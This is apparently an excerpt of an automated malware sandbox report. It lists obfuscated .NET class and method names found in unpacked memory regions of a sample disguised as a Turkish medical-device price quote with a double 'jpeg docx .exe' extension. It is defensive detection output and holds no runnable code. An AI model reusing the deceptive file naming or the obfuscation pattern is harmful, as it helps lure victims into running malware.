                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, AXdt1tHSQMsiFWMEII5.csHigh entropy of concatenated method names: 'ToString', 'vojeqhMQey', 'SbieWlLVGY', 'l15e5prB3b', 'id9efh8ZX0', 'lmteIGjQqZ', 'M6ueCB49Vy', 'dbZeG2laSO', 'i8DvO70Cap9MfDM8Cel', 'o4GtO10HwWPSqc2501Q'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, wgQmqq568Tx4kQ2pWL.csHigh entropy of concatenated method names: 'RcxaOLJtFt', 'lh6aV8iqwt', 'xDb4CTXwtB', 'TBH4GY96hw', 'gyn4myLJWM', 'hkX4h9HmsZ', 'lwK4Pu8JIw', 'UAw4EVXljj', 'Kxg49vjkJA', 'MDK46JWvPO'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, voCSs6j3PsF81pU64J.csHigh entropy of concatenated method names: 'bjEcFKq9oA', 'g8ccTBPN6h', 'ULhccKacEK', 'y21cecrlHM', 'pUBcpi6qxR', 'LvJcuTKRWx', 'Dispose', 'dU5tsis4lt', 'JQXtA6HLd5', 'oplt4mcMk1'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, j5M0979XUreqtQSwl8.csHigh entropy of concatenated method names: 'kOMyML59Sj', 'cNUyQ29Vgg', 'tMMylE8XPE', 'hZCyrnN85E', 'IDvyONabZN', 'T9syJ1NnZ8', 'cC6yVBlf1R', 'hrSyq4Subt', 'DwLyWSAnWn', 'fU4y5dHZpT'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, ucWdtdH1MGCmeE9asfp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VDtbcWUkGe', 'MQ3bgWXvdA', 'jrjbeBmF04', 'HkGbbefNeS', 'N5ZbpaDmpC', 'CoXbNA0ha2', 'ujNbu7VAKn'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, iWtsvpA3n77QHpQDQV.csHigh entropy of concatenated method names: 'Dispose', 'fF8HZ1pU64', 'mRXSIYC3HU', 'VZMZkqQZis', 'Cl6HwXO6Px', 'PS1HzWCd9p', 'ProcessDialogKey', 'GTvSBvYygA', 'zkPSHfAVfQ', 'bYQSS9TD8L'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, MTD8L9wjpgk1SlLc5D.csHigh entropy of concatenated method names: 'hhUg4gV7CB', 'tPFgaelmhW', 'R5ngxPXf6U', 'MvGgyNhZJN', 'EEhgcQZQat', 'SC1gU2YehH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, rLwVHEHBUE0qr1lSYS6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'n0dgL4jJZg', 'wGsgXC8C5G', 'vqUgKyQlWx', 'T2YgRwP2Dg', 'OQUg04WNS2', 'SQyg7EhmnY', 'OIRgYHVUuu'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, aN9AFKHHP4IfUXB8NO3.csHigh entropy of concatenated method names: 'KdmgwQYlVk', 'hLigz5ACKI', 'LoFeBpPqJh', 'NTbeH0rEyq', 'FSVeSBI6wD', 'uomek4xitj', 'LW8e1nB94Y', 'KECedAJT2R', 'byGesSyLot', 'rvheAGqHS5'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, fe9oobUXS7WXTS2K4g.csHigh entropy of concatenated method names: 'cUkkdE3AUf', 'OnNkscZDc9', 'EeFkAQoISV', 'wQ6k4RQXGf', 'YdlkapveWC', 'rHMkxby2xb', 'SxckyDrJa1', 'tmLkUHuT8Y', 'XbVkDtoAJD', 'TvkkoZ9iuu'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, xmrLDZqAV6PyubMqxq.csHigh entropy of concatenated method names: 'PMoARxjOPn', 'npUA0GnyxJ', 'lrmA7mAN2E', 'TnnAYrA5Ry', 'zInAnx3ubY', 'rveAvOZ9PV', 'zRnAjJ9YoY', 'rXqA8DpqYR', 'pVSAZF2pKr', 'rtPAwAa2XX'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, wi83EsSD9wW0IiNYn4.csHigh entropy of concatenated method names: 'HdKlhy090', 'SadrdwXg9', 'OgTJsP3Sk', 'WbWVD7UGH', 'iutWGC5S1', 'nQa50rhXJ', 'z2p7Y9XIN9ZXkSMDvs', 'cC0UhyB0LuiaTcQjTN', 'F7QtDUM6d', 'bjQgBrJ60'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, k3hTmZROOW9tiMOfLh.csHigh entropy of concatenated method names: 'eTHF6bqDnj', 'adoFX7n2O8', 'ARgFRgUIEW', 'CZFF0EJgVD', 'lZ5FI98D8D', 'y4NFCvK5Uw', 'T4pFGmSvbR', 'MIjFmMacNc', 's3dFhBvleZ', 'yIIFP3Mqbc'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, nUiqg9zYnLesSQhMp5.csHigh entropy of concatenated method names: 'y6dgJ0kBmV', 'D8ugqLkEJJ', 'doagW49e3p', 't7xgftIZMM', 'SrfgIqZoOZ', 'bD4gG5sqjK', 'uKmgmHKoTu', 'DxTgu4ahlG', 'TDZgMpXxN9', 't8SgQPjXjK'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, VvYygAZrkPfAVfQHYQ.csHigh entropy of concatenated method names: 'hm2cfgKZDc', 'SZtcIEXmOm', 'zd7cClsM9S', 'QUEcGNo0TD', 'OB7cmA3HgX', 'ukCchbNfcT', 'jMEcPqOUQU', 'NFbcE24Di2', 'bZ9c9tIn53', 'GUgc68NRI8'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, dtgMlj47pVX1V9wtmk.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'barSZWgQXS', 'DSWSwsXJ0v', 'fncSzs1mjH', 'CqbkBH7nBt', 'P4qkHE9uF4', 'ItpkSCI3KR', 'BaUkkAPmis', 'Ju3Nj6lpgImUbaBeTAj'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, d5Nw0hfovkhNbBvZu7.csHigh entropy of concatenated method names: 'D7cxdnJltZ', 'tkYxAak8Ld', 'PhLxaS0URT', 'Huyxye4xfF', 'h4oxUOMRBF', 'm1WanKssal', 'OOWavxBBQr', 'ISVajwlDIp', 'Q78a8DFx2h', 'aEqaZ85yo9'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, xlDXxMv6iFlHG3lr3m.csHigh entropy of concatenated method names: 'Tg5T8tRyPk', 'nLsTwiPtkq', 'yE1tBedV09', 'llPtHT5bM1', 'xwgTLeo9KC', 'C4NTXmxlKt', 'aAeTKyvwNk', 'g9dTRO4BaG', 'LJsT0vAV2K', 'mMIT7qbwBY'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, Ihj2xGWwQDT4qEXmeq.csHigh entropy of concatenated method names: 'UMl4rljy4d', 'PKV4JAHpbf', 'XRe4qGrFi8', 'J654WXxBdZ', 'uV64FMfgdR', 'hTF42J9muu', 'fs84T0YC54', 'jBE4tq8PxH', 'QJT4c9jxR4', 'wyt4gkrdyO'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, JAAXus72oe4KCcZgU6.csHigh entropy of concatenated method names: 'ToString', 'Npk2LYvjqT', 'Rs22IioTFw', 'cBE2CEBryx', 'Waq2GqypiD', 'bgf2m7eT5h', 'JVt2hKyGmS', 'vMF2Po45KM', 'sQg2E0yeib', 'Hib29RM2Xg'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.8dc0000.5.raw.unpack, aVnvd7YQLp1MKjqRGF.csHigh entropy of concatenated method names: 'CcvTo7vR4S', 'XjcTiOZF0I', 'ToString', 'JMmTsS8ykD', 'xLATAyWVdf', 'iUlT4xLJHD', 'hRjTaLjcO2', 'EZvTx7eFWL', 'KyTTyIGf9M', 'LaeTUcnrSe'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, XhKakeKjJ0yW14dDAy.csHigh entropy of concatenated method names: 'Bfw3qbc85X', 'nl33WtVclG', 'q8i3fwic6C', 'YTr3IM7qRG', 'bYE3GMwN2c', 'brq3m5LxUH', 'yH83P3a6Sv', 'Q3V3E5S4gW', 'clr36LwmVJ', 'q3m3LvmkXa'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, vMGhyX1Yrfu5jATuwX.csHigh entropy of concatenated method names: 'UouHymrLDZ', 'fV6HUPyubM', 'IwQHoDT4qE', 'OmeHiqNgQm', 'y2pHFWL15N', 'Y0hH2ovkhN', 'uta8eviIwmbgbCs94m', 'DNEwmUzCjI1Fpr936x', 'ubXHHCHK9r', 'wiNHkBlC2G'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, AXdt1tHSQMsiFWMEII5.csHigh entropy of concatenated method names: 'ToString', 'vojeqhMQey', 'SbieWlLVGY', 'l15e5prB3b', 'id9efh8ZX0', 'lmteIGjQqZ', 'M6ueCB49Vy', 'dbZeG2laSO', 'i8DvO70Cap9MfDM8Cel', 'o4GtO10HwWPSqc2501Q'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, wgQmqq568Tx4kQ2pWL.csHigh entropy of concatenated method names: 'RcxaOLJtFt', 'lh6aV8iqwt', 'xDb4CTXwtB', 'TBH4GY96hw', 'gyn4myLJWM', 'hkX4h9HmsZ', 'lwK4Pu8JIw', 'UAw4EVXljj', 'Kxg49vjkJA', 'MDK46JWvPO'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, voCSs6j3PsF81pU64J.csHigh entropy of concatenated method names: 'bjEcFKq9oA', 'g8ccTBPN6h', 'ULhccKacEK', 'y21cecrlHM', 'pUBcpi6qxR', 'LvJcuTKRWx', 'Dispose', 'dU5tsis4lt', 'JQXtA6HLd5', 'oplt4mcMk1'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, j5M0979XUreqtQSwl8.csHigh entropy of concatenated method names: 'kOMyML59Sj', 'cNUyQ29Vgg', 'tMMylE8XPE', 'hZCyrnN85E', 'IDvyONabZN', 'T9syJ1NnZ8', 'cC6yVBlf1R', 'hrSyq4Subt', 'DwLyWSAnWn', 'fU4y5dHZpT'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, ucWdtdH1MGCmeE9asfp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VDtbcWUkGe', 'MQ3bgWXvdA', 'jrjbeBmF04', 'HkGbbefNeS', 'N5ZbpaDmpC', 'CoXbNA0ha2', 'ujNbu7VAKn'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, iWtsvpA3n77QHpQDQV.csHigh entropy of concatenated method names: 'Dispose', 'fF8HZ1pU64', 'mRXSIYC3HU', 'VZMZkqQZis', 'Cl6HwXO6Px', 'PS1HzWCd9p', 'ProcessDialogKey', 'GTvSBvYygA', 'zkPSHfAVfQ', 'bYQSS9TD8L'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, MTD8L9wjpgk1SlLc5D.csHigh entropy of concatenated method names: 'hhUg4gV7CB', 'tPFgaelmhW', 'R5ngxPXf6U', 'MvGgyNhZJN', 'EEhgcQZQat', 'SC1gU2YehH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, rLwVHEHBUE0qr1lSYS6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'n0dgL4jJZg', 'wGsgXC8C5G', 'vqUgKyQlWx', 'T2YgRwP2Dg', 'OQUg04WNS2', 'SQyg7EhmnY', 'OIRgYHVUuu'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, aN9AFKHHP4IfUXB8NO3.csHigh entropy of concatenated method names: 'KdmgwQYlVk', 'hLigz5ACKI', 'LoFeBpPqJh', 'NTbeH0rEyq', 'FSVeSBI6wD', 'uomek4xitj', 'LW8e1nB94Y', 'KECedAJT2R', 'byGesSyLot', 'rvheAGqHS5'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, fe9oobUXS7WXTS2K4g.csHigh entropy of concatenated method names: 'cUkkdE3AUf', 'OnNkscZDc9', 'EeFkAQoISV', 'wQ6k4RQXGf', 'YdlkapveWC', 'rHMkxby2xb', 'SxckyDrJa1', 'tmLkUHuT8Y', 'XbVkDtoAJD', 'TvkkoZ9iuu'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, xmrLDZqAV6PyubMqxq.csHigh entropy of concatenated method names: 'PMoARxjOPn', 'npUA0GnyxJ', 'lrmA7mAN2E', 'TnnAYrA5Ry', 'zInAnx3ubY', 'rveAvOZ9PV', 'zRnAjJ9YoY', 'rXqA8DpqYR', 'pVSAZF2pKr', 'rtPAwAa2XX'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, wi83EsSD9wW0IiNYn4.csHigh entropy of concatenated method names: 'HdKlhy090', 'SadrdwXg9', 'OgTJsP3Sk', 'WbWVD7UGH', 'iutWGC5S1', 'nQa50rhXJ', 'z2p7Y9XIN9ZXkSMDvs', 'cC0UhyB0LuiaTcQjTN', 'F7QtDUM6d', 'bjQgBrJ60'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, k3hTmZROOW9tiMOfLh.csHigh entropy of concatenated method names: 'eTHF6bqDnj', 'adoFX7n2O8', 'ARgFRgUIEW', 'CZFF0EJgVD', 'lZ5FI98D8D', 'y4NFCvK5Uw', 'T4pFGmSvbR', 'MIjFmMacNc', 's3dFhBvleZ', 'yIIFP3Mqbc'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, nUiqg9zYnLesSQhMp5.csHigh entropy of concatenated method names: 'y6dgJ0kBmV', 'D8ugqLkEJJ', 'doagW49e3p', 't7xgftIZMM', 'SrfgIqZoOZ', 'bD4gG5sqjK', 'uKmgmHKoTu', 'DxTgu4ahlG', 'TDZgMpXxN9', 't8SgQPjXjK'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, VvYygAZrkPfAVfQHYQ.csHigh entropy of concatenated method names: 'hm2cfgKZDc', 'SZtcIEXmOm', 'zd7cClsM9S', 'QUEcGNo0TD', 'OB7cmA3HgX', 'ukCchbNfcT', 'jMEcPqOUQU', 'NFbcE24Di2', 'bZ9c9tIn53', 'GUgc68NRI8'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, dtgMlj47pVX1V9wtmk.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'barSZWgQXS', 'DSWSwsXJ0v', 'fncSzs1mjH', 'CqbkBH7nBt', 'P4qkHE9uF4', 'ItpkSCI3KR', 'BaUkkAPmis', 'Ju3Nj6lpgImUbaBeTAj'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, d5Nw0hfovkhNbBvZu7.csHigh entropy of concatenated method names: 'D7cxdnJltZ', 'tkYxAak8Ld', 'PhLxaS0URT', 'Huyxye4xfF', 'h4oxUOMRBF', 'm1WanKssal', 'OOWavxBBQr', 'ISVajwlDIp', 'Q78a8DFx2h', 'aEqaZ85yo9'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, xlDXxMv6iFlHG3lr3m.csHigh entropy of concatenated method names: 'Tg5T8tRyPk', 'nLsTwiPtkq', 'yE1tBedV09', 'llPtHT5bM1', 'xwgTLeo9KC', 'C4NTXmxlKt', 'aAeTKyvwNk', 'g9dTRO4BaG', 'LJsT0vAV2K', 'mMIT7qbwBY'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, Ihj2xGWwQDT4qEXmeq.csHigh entropy of concatenated method names: 'UMl4rljy4d', 'PKV4JAHpbf', 'XRe4qGrFi8', 'J654WXxBdZ', 'uV64FMfgdR', 'hTF42J9muu', 'fs84T0YC54', 'jBE4tq8PxH', 'QJT4c9jxR4', 'wyt4gkrdyO'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, JAAXus72oe4KCcZgU6.csHigh entropy of concatenated method names: 'ToString', 'Npk2LYvjqT', 'Rs22IioTFw', 'cBE2CEBryx', 'Waq2GqypiD', 'bgf2m7eT5h', 'JVt2hKyGmS', 'vMF2Po45KM', 'sQg2E0yeib', 'Hib29RM2Xg'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3db3a48.0.raw.unpack, aVnvd7YQLp1MKjqRGF.csHigh entropy of concatenated method names: 'CcvTo7vR4S', 'XjcTiOZF0I', 'ToString', 'JMmTsS8ykD', 'xLATAyWVdf', 'iUlT4xLJHD', 'hRjTaLjcO2', 'EZvTx7eFWL', 'KyTTyIGf9M', 'LaeTUcnrSe'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, XhKakeKjJ0yW14dDAy.csHigh entropy of concatenated method names: 'Bfw3qbc85X', 'nl33WtVclG', 'q8i3fwic6C', 'YTr3IM7qRG', 'bYE3GMwN2c', 'brq3m5LxUH', 'yH83P3a6Sv', 'Q3V3E5S4gW', 'clr36LwmVJ', 'q3m3LvmkXa'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, vMGhyX1Yrfu5jATuwX.csHigh entropy of concatenated method names: 'UouHymrLDZ', 'fV6HUPyubM', 'IwQHoDT4qE', 'OmeHiqNgQm', 'y2pHFWL15N', 'Y0hH2ovkhN', 'uta8eviIwmbgbCs94m', 'DNEwmUzCjI1Fpr936x', 'ubXHHCHK9r', 'wiNHkBlC2G'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, AXdt1tHSQMsiFWMEII5.csHigh entropy of concatenated method names: 'ToString', 'vojeqhMQey', 'SbieWlLVGY', 'l15e5prB3b', 'id9efh8ZX0', 'lmteIGjQqZ', 'M6ueCB49Vy', 'dbZeG2laSO', 'i8DvO70Cap9MfDM8Cel', 'o4GtO10HwWPSqc2501Q'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, wgQmqq568Tx4kQ2pWL.csHigh entropy of concatenated method names: 'RcxaOLJtFt', 'lh6aV8iqwt', 'xDb4CTXwtB', 'TBH4GY96hw', 'gyn4myLJWM', 'hkX4h9HmsZ', 'lwK4Pu8JIw', 'UAw4EVXljj', 'Kxg49vjkJA', 'MDK46JWvPO'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, voCSs6j3PsF81pU64J.csHigh entropy of concatenated method names: 'bjEcFKq9oA', 'g8ccTBPN6h', 'ULhccKacEK', 'y21cecrlHM', 'pUBcpi6qxR', 'LvJcuTKRWx', 'Dispose', 'dU5tsis4lt', 'JQXtA6HLd5', 'oplt4mcMk1'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, j5M0979XUreqtQSwl8.csHigh entropy of concatenated method names: 'kOMyML59Sj', 'cNUyQ29Vgg', 'tMMylE8XPE', 'hZCyrnN85E', 'IDvyONabZN', 'T9syJ1NnZ8', 'cC6yVBlf1R', 'hrSyq4Subt', 'DwLyWSAnWn', 'fU4y5dHZpT'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, ucWdtdH1MGCmeE9asfp.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VDtbcWUkGe', 'MQ3bgWXvdA', 'jrjbeBmF04', 'HkGbbefNeS', 'N5ZbpaDmpC', 'CoXbNA0ha2', 'ujNbu7VAKn'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, iWtsvpA3n77QHpQDQV.csHigh entropy of concatenated method names: 'Dispose', 'fF8HZ1pU64', 'mRXSIYC3HU', 'VZMZkqQZis', 'Cl6HwXO6Px', 'PS1HzWCd9p', 'ProcessDialogKey', 'GTvSBvYygA', 'zkPSHfAVfQ', 'bYQSS9TD8L'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, MTD8L9wjpgk1SlLc5D.csHigh entropy of concatenated method names: 'hhUg4gV7CB', 'tPFgaelmhW', 'R5ngxPXf6U', 'MvGgyNhZJN', 'EEhgcQZQat', 'SC1gU2YehH', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, rLwVHEHBUE0qr1lSYS6.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'n0dgL4jJZg', 'wGsgXC8C5G', 'vqUgKyQlWx', 'T2YgRwP2Dg', 'OQUg04WNS2', 'SQyg7EhmnY', 'OIRgYHVUuu'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, aN9AFKHHP4IfUXB8NO3.csHigh entropy of concatenated method names: 'KdmgwQYlVk', 'hLigz5ACKI', 'LoFeBpPqJh', 'NTbeH0rEyq', 'FSVeSBI6wD', 'uomek4xitj', 'LW8e1nB94Y', 'KECedAJT2R', 'byGesSyLot', 'rvheAGqHS5'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, fe9oobUXS7WXTS2K4g.csHigh entropy of concatenated method names: 'cUkkdE3AUf', 'OnNkscZDc9', 'EeFkAQoISV', 'wQ6k4RQXGf', 'YdlkapveWC', 'rHMkxby2xb', 'SxckyDrJa1', 'tmLkUHuT8Y', 'XbVkDtoAJD', 'TvkkoZ9iuu'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, xmrLDZqAV6PyubMqxq.csHigh entropy of concatenated method names: 'PMoARxjOPn', 'npUA0GnyxJ', 'lrmA7mAN2E', 'TnnAYrA5Ry', 'zInAnx3ubY', 'rveAvOZ9PV', 'zRnAjJ9YoY', 'rXqA8DpqYR', 'pVSAZF2pKr', 'rtPAwAa2XX'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, wi83EsSD9wW0IiNYn4.csHigh entropy of concatenated method names: 'HdKlhy090', 'SadrdwXg9', 'OgTJsP3Sk', 'WbWVD7UGH', 'iutWGC5S1', 'nQa50rhXJ', 'z2p7Y9XIN9ZXkSMDvs', 'cC0UhyB0LuiaTcQjTN', 'F7QtDUM6d', 'bjQgBrJ60'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, k3hTmZROOW9tiMOfLh.csHigh entropy of concatenated method names: 'eTHF6bqDnj', 'adoFX7n2O8', 'ARgFRgUIEW', 'CZFF0EJgVD', 'lZ5FI98D8D', 'y4NFCvK5Uw', 'T4pFGmSvbR', 'MIjFmMacNc', 's3dFhBvleZ', 'yIIFP3Mqbc'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, nUiqg9zYnLesSQhMp5.csHigh entropy of concatenated method names: 'y6dgJ0kBmV', 'D8ugqLkEJJ', 'doagW49e3p', 't7xgftIZMM', 'SrfgIqZoOZ', 'bD4gG5sqjK', 'uKmgmHKoTu', 'DxTgu4ahlG', 'TDZgMpXxN9', 't8SgQPjXjK'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, VvYygAZrkPfAVfQHYQ.csHigh entropy of concatenated method names: 'hm2cfgKZDc', 'SZtcIEXmOm', 'zd7cClsM9S', 'QUEcGNo0TD', 'OB7cmA3HgX', 'ukCchbNfcT', 'jMEcPqOUQU', 'NFbcE24Di2', 'bZ9c9tIn53', 'GUgc68NRI8'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, dtgMlj47pVX1V9wtmk.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'barSZWgQXS', 'DSWSwsXJ0v', 'fncSzs1mjH', 'CqbkBH7nBt', 'P4qkHE9uF4', 'ItpkSCI3KR', 'BaUkkAPmis', 'Ju3Nj6lpgImUbaBeTAj'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, d5Nw0hfovkhNbBvZu7.csHigh entropy of concatenated method names: 'D7cxdnJltZ', 'tkYxAak8Ld', 'PhLxaS0URT', 'Huyxye4xfF', 'h4oxUOMRBF', 'm1WanKssal', 'OOWavxBBQr', 'ISVajwlDIp', 'Q78a8DFx2h', 'aEqaZ85yo9'
                    Source: 1.2.fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe.3f54118.3.raw.unpack, xlDXxMv6iFlHG3lr3m.csHigh entropy of concatenated method names: 'Tg5T8tRyPk', 'nLsTwiPtkq', 'yE1tBedV09', 'llPtHT5bM1', 'xwgTLeo9KC', 'C4NTXmxlKt', 'aAeTKyvwNk', 'g9dTRO4BaG', 'LJsT0vAV2K', 'mMIT7qbwBY'
